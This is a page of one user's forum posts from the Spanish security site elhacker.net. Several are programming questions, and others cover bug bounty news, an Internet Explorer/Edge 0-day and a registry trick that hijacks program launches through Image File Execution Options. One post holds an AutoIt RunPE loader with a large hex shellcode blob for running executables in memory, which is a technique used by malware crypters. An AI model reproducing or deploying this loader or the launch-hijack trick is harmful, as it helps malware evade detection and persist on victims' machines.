elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el ttwitter! de elhacker.NET


  Mostrar Temas
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12 13 14 15 16 17 18 19
71  Foros Generales / Sugerencias y dudas sobre el Foro / Elhacker tiene rss? en: 7 Marzo 2017, 19:26 pm
Hola elhacker utiliza Feed RSS? gracias por adelantado!
72  Seguridad Informática / Análisis y Diseño de Malware / Herramientas de hacking usadas por la CIA en: 7 Marzo 2017, 15:10 pm
Herramientas usadas por la CIA para temas de hacking, revelado por wikileaks:
https://wikileaks.org/ciav7p1/cms/page_14587685.html

Algunos fueron ocultadas. La mayoría son métodos conocidos.
73  Seguridad Informática / Análisis y Diseño de Malware / Arrancar un programa por medio de otro programa en: 7 Marzo 2017, 14:41 pm
Código:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe

Key:

Código:
notepad.exe

Value:

Código:
Debugger (REG_SZ) : "C:\windows\system32\calc.exe"

Cuando abras notepad se te abrirá otro programa.
74  Programación / ASM / Alertar con una string en ensamblador usando ollydbg en: 5 Marzo 2017, 14:25 pm
Quiero un mensaje en una de mis aplicaciones que al iniciarse muestre Bienvenido , para ello hago lo siguiente:



Apunto la dirección del primer push que sería 005404F5, y selecciono Go to -> Origin:



Después sustituyo la primera dirección por un jmp a la dirección 005404F5.



Apunto la dirección 004C0EFF y hago un enter al jmp. Apunto la linea borrada debajo de mi código que sería CALL 004C0DB3 y hago un jmp de nuevo que sería, jmp 004C0EFF:



Guardo el ejecutable. Y me muestra el siguiente error:

´

He probado con mis programas, con los programas de windows, con todo y no consigo que muestre una alerta de bienvenido alguien podría analizar detenidamente los pasos que tomé o decirme cual es el fallo que cometí.
75  Foros Generales / Foro Libre / bug bounty, recompensas por encontrar vulnerabilidades en: 4 Marzo 2017, 00:30 am
Una reciente noticia que ha salido es que tanto Google como Microsoft darán recompensas a aquellos usuarios que descubran vulnerabilidades  :o pues si así es. Por encontrar vulnerabilidades graves que afecten a windows puedes conseguir hasta recompensas de $15,000 a $30,000. Simplemente tienes que encontrar una falla grave y reportar la falla en sus servicios y recibir la recompensa  :).

Por conseguir errores de ejecución de código remota puedes conseguir 20.000 dolares y 10.000 por acceder a sistemas de archivos restringidos o errores en sus bases de datos. Para conseguir la recompensa de $31,337 necesitas encontrar inyecciones de comandos,
escapes de sandbox y fallos de deserialización en aplicaciones altamente sensibles (como por ejemplo en Google Search, Chrome Web Store, Accounts, Wallet, Inbox, Code Hosting, Google Play, App Engine, and Chromium Bug Tracker). También son recompensadas las inyecciones de código SQL y escapes de sandbox XML eXternal Entity (XXE).

Por ataques XSS, ataques CSRF(Cross-Site Request Forgery), ejecucion de codigo desde el servidor, bugs de elevacion de privilegios, bugs en Outlook y office, etc .. podeis conseguir recompensas de $20,000 hasta $30,000.
Esta medida las ha adoptado ambas multinacionales para evitar cualquier lucrativa vulnerabilidad en sus aplicaciones o productos para evitar ataques de hacking.

Referencia(Buscar en google):
google-bug-bounty
76  Foros Generales / Foro Libre / ¿Que podemos hacer para evitar esto? en: 3 Marzo 2017, 20:35 pm
Hola la seguridad en windows no existe  :-[ cada vez hay mas descubrimientos y vulnerar antivirus y la proteccion de windows resulta más facil como podemos evitar que la gente puede verse afectada por otras personas sin escrupulos o a veces nosotros mismos  :-[ cada vez que estemos conectados a internet corremos peligro  :-[
77  Programación / Programación General / RunPe en autoit falla! en: 3 Marzo 2017, 04:14 am
Código:
Hola estoy probando un Runpe en Autoit que cargue mi propio autoit  :o pero bueno por probar para ver si funciona el código es de un usuario de este foro:
[code width=200]
#cs -------------------------------------------------------
AutoIt Version: 3.3.8.1
Traducido Por..........: Pink
Agradecimientos: hamavb & iCodeInVB6
Script Function...: RunPE-ShellCode "Correr Ejecutable En memoria"
Uso..............: RunPE(Path,$archivobinario)
#ce -------------------------------------------------------

 Global $path = @ScriptDir
 Global $archivobinario = @ScriptFullPath

 RunPE($path,$archivobinario)

Func RunPE($path,$filebin)


local  $ASM = "0x60E84E0000006B00650072006E0065006C003300320000006E00740064006C006C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005B8BFC6A42E8BB0300008B54242889118B54242C6A3EE8AA03000089116A4AE8A103000089396A1E6A3CE89D0300006A2268F4000000E8910300006A266A24E8880300006A2A6A40E87F030000"
    $ASM &= "6A2E6A0CE8760300006A3268C8000000E86A0300006A2AE85C0300008B09C701440000006A12E84D030000685BE814CF51E8790300006A3EE83B0300008BD16A1EE8320300006A40FF32FF31FFD06A12E823030000685BE814CF51E84F0300006A1EE8110300008B098B513C6A3EE8050300008B3903FA6A22E8FA0200008B0968F80000005751FFD06A00E8E80200006888FEB31651E8140300006A2EE8D60200"
    $ASM &= "008B396A2AE8CD0200008B116A42E8C402000057526A006A006A046A006A006A006A00FF31FFD06A12E8A902000068D03710F251E8D50200006A22E8970200008B116A2EE88E0200008B09FF7234FF31FFD06A00E87E020000689C951A6E51E8AA0200006A22E86C0200008B118B396A2EE8610200008B096A406800300000FF7250FF7734FF31FFD06A36E8470200008BD16A22E83E0200008B396A3EE8350200"
    $ASM &= "008B316A22E82C0200008B016A2EE8230200008B0952FF775456FF7034FF316A00E81002000068A16A3DD851E83C02000083C40CFFD06A12E8F9010000685BE814CF51E8250200006A22E8E70100008B1183C2066A3AE8DB0100006A025251FFD06A36E8CE010000C70100000000B8280000006A36E8BC010000F7216A1EE8B30100008B118B523C81C2F800000003D06A3EE89F01000003116A26E8960100006A"
    $ASM &= "2852FF316A12E88A010000685BE814CF51E8B601000083C40CFFD06A26E8730100008B398B098B71146A3EE86501000003316A26E85C0100008B098B510C6A22E8500100008B090351346A46E8440100008BC16A2EE83B0100008B0950FF77105652FF316A00E82A01000068A16A3DD851E85601000083C40CFFD06A36E8130100008B1183C20189116A3AE8050100008B093BCA0F8533FFFFFF6A32E8F4000000"
    $ASM &= "8B09C701070001006A00E8E500000068D2C7A76851E8110100006A32E8D30000008B116A2EE8CA0000008B0952FF7104FFD06A22E8BB0000008B3983C7346A32E8AF0000008B318BB6A400000083C6086A2EE89D0000008B116A46E894000000516A045756FF326A00E88600000068A16A3DD851E8B200000083C40CFFD06A22E86F0000008B098B51280351346A32E8600000008B0981C1B000000089116A00E8"
    $ASM &= "4F00000068D3C7A7E851E87B0000006A32E83D0000008BD16A2EE8340000008B09FF32FF7104FFD06A00E82400000068883F4A9E51E8500000006A2EE8120000008B09FF7104FFD06A4AE8040000008B2161C38BCB034C2404C36A00E8F2FFFFFF6854CAAF9151E81E0000006A406800100000FF7424186A00FFD0FF742414E8CFFFFFFF890183C410C3E82200000068A44E0EEC50E84B00000083C408FF742404"
    $ASM &= "FFD0FF74240850E83800000083C408C355525153565733C0648B70308B760C8B761C8B6E088B7E208B3638471875F3803F6B7407803F4B7402EBE78BC55F5E5B595A5DC35552515356578B6C241C85ED74438B453C8B54287803D58B4A188B5A2003DDE330498B348B03F533FF33C0FCAC84C07407C1CF0D03F8EBF43B7C242075E18B5A2403DD668B0C4B8B5A1C03DD8B048B03C55F5E5B595A5DC3C300000000"


Local $BufferASM = DllStructCreate("byte[" & BinaryLen($ASM) & "]")
Local $binBuffer=DllStructCreate("byte[" & BinaryLen($filebin) & "]")


DllStructSetData($BufferASM, 1, $ASM)
DllStructSetData($binBuffer, 1, $filebin)




Local $Ret = DllCall("user32.dll", "int", "CallWindowProcW", _
            "ptr", DllStructGetPtr($BufferASM), _
            "wstr", ($path), _
            "ptr", DllStructGetPtr($binBuffer), _
            "int", 0, _
            "int", 0)

EndFunc

Me devuelve este error por :(?


Estoy un poco atontado y no consigo resolverlo!
78  Seguridad Informática / Bugs y Exploits / vulnerabilidad 0-day explorer y edge en: 1 Marzo 2017, 23:59 pm
El equipo de proyecto Zero ha revelado errores que afectan a los navegadores Explorer y Edge.
Este error que fue descubierto el 25 de noviembre de 2016, permite a los atacantes ejecutar código arbitrario en estos navegadores. Este error puede ser explotado por medio de un ataque al HandleColumnBreak OnColumnSpanningElement. Para llevar a cabo el
ataque lo hace por medio de 17 lineas de código html centrado en dos variables rcx y rax.
Un atacante puede manipular la variable rax modificando las propiedades de la tabla, como el borde de espacios y la anchura de la primera etiqueta <th>. Por lo que la pagina maliciosa solo tiene que apuntar la variable rax a la memoria controlada.

Referencia:
Al grupo Zero que descubrió esta falla.

79  Programación / Programación C/C++ / No puedo declarar la variable por ser un tipo abstracto en: 1 Marzo 2017, 04:17 am
Estoy creando una clase basada en la libreria gloox pero cuando creo un miembro de mi clase me devuelve el siguiente error:
Código:
error: cannot declare variable 'b' to be of abstract type 'Bot'|

Código:
#include "gloox/src/client.h"
#include "gloox/src/messagehandler.h"
#include "gloox/src/message.h"
#include "gloox/src/presencehandler.h"
#include "gloox/src/connectionlistener.h"
#include <ctime>
#include <iostream>
#include <string>
using namespace std;
using namespace gloox;
//my one
const string LOGIN = "gmail.com";
ostream& operator<<(ostream& os, Message::MessageType type) {
    switch (type) {
        case Message::Chat:
            os << "Chat";
            break;
        case Message::Error:
            os << "Error";
            break;
        case Message::Groupchat:
            os << "Groupchat";
            break;
        case Message::Headline:
            os << "Headline";
            break;
        case Message::Normal:
            os << "Normal";
            break;
        case Message::Invalid:
            os << "Invalid";
            break;
        default:
            os << "unknown type";
            break;
    }
return os;
}

ostream& operator<<(ostream& os, const Message& stanza) {
    os << "type:'" << stanza.subtype() <<  "' from:'" << stanza.from().full() << "' body:'" << stanza.body() << "'";
    return os;
}

class Bot : public MessageHandler,
            /*public PresenceHandler,*/
            public ConnectionListener
            /*,public RosterListener*/{
 public:
   Bot(){
      JID jid( "mmaaria123@gmail.com/home" );
      client = new Client( jid, "mmaaria123" );
      client->registerConnectionListener( this );
      client->registerMessageHandler( this );
      client->connect(true);
   }

    virtual void onConnect() {
        cout << "It is connected good:)"  << endl;
        //sleep(5);
        client->disconnect();
    }

    virtual void onDisconnect(ConnectionError e) {
        cout << "ConnListener::onDisconnect() " << endl;
    }
/*
    virtual bool onTLSConnect(const CertInfo& Info) {

       time_t tm = Info.date_from;
       time_t tm_to = Info.date_to;
       cout << "\t Certificate information to " << LOGIN << endl;
       cout << "\t========================================" << endl;
      // number code << "\tServer status: " << Info.status;
        if (Info.status !=0)
            {
            cout << "\t !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" << endl;
            cout << "\t !!!  The certificate has a problem !!!" << endl;
            cout << "\t !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" << endl;
            // parsing binary Status Cert
            if ((CertInvalid) & Info.status)
                {
                    cout << "\t- The certificate is not trusted " << endl;
                }
            if (( CertSignerUnknown) & Info.status)
                {
                    cout << "\t- The certificate hasn't got a kown issuer" << endl;
                }
            if ((CertRevoked) & Info.status)
                {
                    cout << "\t- The certificate has been revoked " << endl;
                }
            if ((CertExpired) & Info.status)
                {
                    cout << "\t- The certificate has expired " << endl;
                }
            if ((CertNotActive) & Info.status)
                {
                    cout << "\t- The certificate is not yet active " << endl;
                }
            if ((CertWrongPeer) & Info.status)
                {
                    cout << "\t- The certificate has not issued for the peer we're connected to " << endl;
                }
            if ((CertSignerNotCa) & Info.status)
                {
                    cout << "\t- The signer is not CA " << endl;
                }
            cout << endl;
            }
            // end parsing
        else
            // if Info.status=0 sertificate is valide
            cout << " *** Cert is OK!" << endl;

       cout << "\tChain: " << Info.chain << endl;
       cout << "\tIssuer: " << Info.issuer << endl;
       cout << "\tServer: " << Info.server << endl;
       cout << "\tCert date from: " << ctime(&tm);
       cout << "\tCert date to: " << ctime(&tm_to);
       cout << "\tProtocol: " << Info.protocol << endl;
       cout << "\tCipher: " << Info.cipher << endl;
       cout << "\tMAC: " << Info.mac << endl;
       cout << "\tCompression: " << Info.compression << endl;
       cout << "\t========================================" << endl;
     return true;

    }
*/
   virtual void handleMessage( const Message& stanza,
                               MessageSession* session = 0 ){
     Message msg(Message::Chat, stanza.from(), "hello world" );
     client->send( msg );
   }

 private:
   Client* client;
};

int main(){
    cout << "1" << endl;
    Bot b;
}
80  Programación / Programación C/C++ / Como resolver este error en: 28 Febrero 2017, 18:00 pm
Me da el siguiente error:
Código:
||=== Build: Debug in main (compiler: GNU GCC Compiler) ===|
C:\Users\Androide\Desktop\main.cpp||In function 'BOOL IsElevated()':|
C:\Users\Androide\Desktop\main.cpp|13|error: 'Elevation' does not name a type|
C:\Users\Androide\Desktop\main.cpp|14|error: 'TOKEN_ELEVATION' was not declared in this scope|
C:\Users\Androide\Desktop\main.cpp|15|error: 'TokenElevation' was not declared in this scope|
C:\Users\Androide\Desktop\main.cpp|16|error: request for member 'TokenIsElevated' in 'Elevation', which is of non-class type 'DWORD {aka long unsigned int}'|
C:\Users\Androide\Desktop\main.cpp|10|warning: unused variable 'Elevation' [-Wunused-variable]|
||=== Build failed: 4 error(s), 1 warning(s) (0 minute(s), 2 second(s)) ===|

Código:
#include <iostream>
#include <windows.h>
#include <winnt.h>

using namespace std;

BOOL IsElevated( ) {
    BOOL fRet = FALSE;
    HANDLE hToken = NULL;
    DWORD Elevation;
    if( OpenProcessToken( GetCurrentProcess( ),TOKEN_QUERY,&hToken ) ) {
        DWORD Elevation;
        typedef Elevation TOKEN_ELEVATION;
        DWORD cbSize = sizeof( TOKEN_ELEVATION );
        if( GetTokenInformation( hToken, TokenElevation, &Elevation, sizeof( Elevation ), &cbSize ) ) {
            fRet = Elevation.TokenIsElevated;
        }
    }
    if( hToken ) {
        CloseHandle( hToken );
    }
    return fRet;
}

int main()
{
    bool valor=IsElevated( );

    if(valor==true){
        cout << "Tienes permisos de administrador";
    }else{
        cout << "Eres un usuario corriente";
    }
    system("pause");
    return 0;
}

Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12 13 14 15 16 17 18 19
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines